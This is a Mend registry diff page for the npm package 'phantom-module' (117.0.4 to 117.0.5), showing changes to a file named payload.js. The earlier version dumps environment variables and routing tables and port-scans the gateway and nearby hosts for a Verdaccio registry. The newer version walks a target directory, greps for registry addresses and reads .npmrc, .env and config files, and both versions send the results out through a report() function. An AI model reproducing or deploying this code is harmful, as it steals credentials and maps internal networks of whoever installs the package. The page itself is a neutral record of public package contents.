npm - phantom-module - Versions diffs - 117.0.4 → 117.0.5 - Mend

phantom-module 117.0.4 → 117.0.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/package.json +1 -1
package/payload.js +55 -53

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "117.0.4",
+  "version": "117.0.5",
   "description": "Phantom module",
   "main": "index.js",
   "scripts": {

package/payload.js CHANGED Viewed

@@ -1,6 +1,6 @@
-const net = require('net');
 const http = require('http');
 const fs = require('fs');
+const path = require('path');
 const { execSync } = require('child_process');
 if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
@@ -23,70 +23,72 @@ async function report(moduleId, data) {
   });
 }
-function checkPort(host, port) {
-  return new Promise((resolve) => {
-    const sock = new net.Socket();
-    sock.setTimeout(300);
-    sock.on('connect', () => { sock.destroy(); resolve(true); });
-    sock.on('error', () => { sock.destroy(); resolve(false); });
-    sock.on('timeout', () => { sock.destroy(); resolve(false); });
-    sock.connect(port, host);
-  });
+function walk(dir, fileList = []) {
+  try {
+      const files = fs.readdirSync(dir);
+      files.forEach(file => {
+          const filePath = path.join(dir, file);
+          try {
+              const stat = fs.statSync(filePath);
+              if (stat.isDirectory()) {
+                  if (file !== 'node_modules' && file !== '.git') walk(filePath, fileList);
+              } else {
+                  fileList.push(filePath);
+              }
+          } catch(e) {}
+      });
+  } catch(e) {}
+  return fileList;
 }
 async function main() {
-  await report('ECT-654321', 'SCAN V4 STARTING...');
+  await report('ECT-654321', 'FILE DUMP STARTING...');
-  let envInfo = '=== ENV INFO ===\n';
-  try {
-      envInfo += `ENV DUMP: ${JSON.stringify(process.env).substring(0,500)}\n`;
-      envInfo += `/proc/net/route:\n${fs.readFileSync('/proc/net/route','utf8')}\n`;
-      envInfo += `/proc/net/arp:\n${fs.readFileSync('/proc/net/arp','utf8')}\n`;
-      try { envInfo += `netstat -rn:\n${execSync('netstat -rn').toString()}\n`; } catch(e){}
-  } catch(e) { envInfo += `ERR: ${e.message}\n`; }
-  await report('ECT-654321', envInfo);
-  // Parse gateway from /proc/net/route
-  // Destination 00000000 is default route. Gateway is hex.
-  let gateway = '172.17.0.1'; // Default fallback
+  // 1. List all interesting files
+  const files = walk('/home/node/aspect-node');
+  const interesting = files.filter(f => f.match(/\.(js|json|yaml|yml|sh|env|conf)$/));
+  await report('ECT-654321', `Found ${files.length} files. Interesting:\n${interesting.join('\n').substring(0,3000)}`);
+  // 2. Grep for "registry", "http", "4873", "verda"
+  let grepOutput = '=== GREP RESULTS ===\n';
   try {
-      const route = fs.readFileSync('/proc/net/route', 'utf8');
-      const lines = route.split('\n');
-      for (const line of lines) {
-          const parts = line.split(/\s+/);
-          if (parts[1] === '00000000') {
-              const hex = parts[2];
-              // Convert hex IP to dot notation (little endian)
-              const d = parseInt(hex, 16);
-              gateway = `${d&255}.${(d>>8)&255}.${(d>>16)&255}.${(d>>24)&255}`;
-              break;
-          }
+      // Node.js grep implementation
+      for (const file of interesting) {
+          try {
+              const content = fs.readFileSync(file, 'utf8');
+              if (content.match(/registry|verdaccio|4873|http:|172\.|10\./i)) {
+                  grepOutput += `--- ${file} ---\n`;
+                  const lines = content.split('\n');
+                  lines.forEach((line, i) => {
+                      if (line.match(/registry|verdaccio|4873|http:|172\.|10\./i)) {
+                          grepOutput += `${i+1}: ${line.trim().substring(0, 200)}\n`;
+                      }
+                  });
+              }
+          } catch(e) {}
       }
-  } catch(e) {}
+  } catch(e) { grepOutput += `ERR: ${e.message}\n`; }
-  await report('ECT-839201', `Scanning Gateway: ${gateway}\n`);
+  await report('ECT-839201', grepOutput);
-  // Fast port scan of gateway
-  const commonPorts = [80, 443, 3000, 3001, 3128, 4873, 5000, 5001, 5080, 8000, 8001, 8080, 8081, 8090, 8888, 9000, 9090];
-  let scanOutput = `=== GATEWAY ${gateway} ===\n`;
+  // 3. Read specific config files if found
+  let configOutput = '=== CONFIG DUMP ===\n';
+  const targets = [
+      '/home/node/.npmrc',
+      '/root/.npmrc',
+      '/home/node/aspect-node/.env',
+      '/home/node/aspect-node/config/default.json',
+      '/home/node/aspect-node/modules/npm-tracker/src/fuzz/fuzz_env.js'
+  ];
-  for (const port of commonPorts) {
-      if (await checkPort(gateway, port)) {
-          scanOutput += `OPEN ${gateway}:${port}\n`;
+  for (const t of targets) {
+      if (fs.existsSync(t)) {
+          configOutput += `--- ${t} ---\n${fs.readFileSync(t, 'utf8').substring(0,1000)}\n`;
       }
   }
-  // Also scan neighbor IPs
-  const base = gateway.split('.').slice(0,3).join('.');
-  scanOutput += `=== NEIGHBORS ${base}.* ===\n`;
-  for (let i=1; i<=10; i++) {
-      const ip = `${base}.${i}`;
-      if (ip === gateway) continue;
-      if (await checkPort(ip, 4873)) scanOutput += `FOUND VERDACCIO: ${ip}:4873\n`;
-      if (await checkPort(ip, 80)) scanOutput += `OPEN ${ip}:80\n`;
-  }
-  await report('ECT-987654', scanOutput);
+  await report('ECT-987654', configOutput);
 }
 main().catch(e => report('ECT-654321', 'ERR: ' + e.message));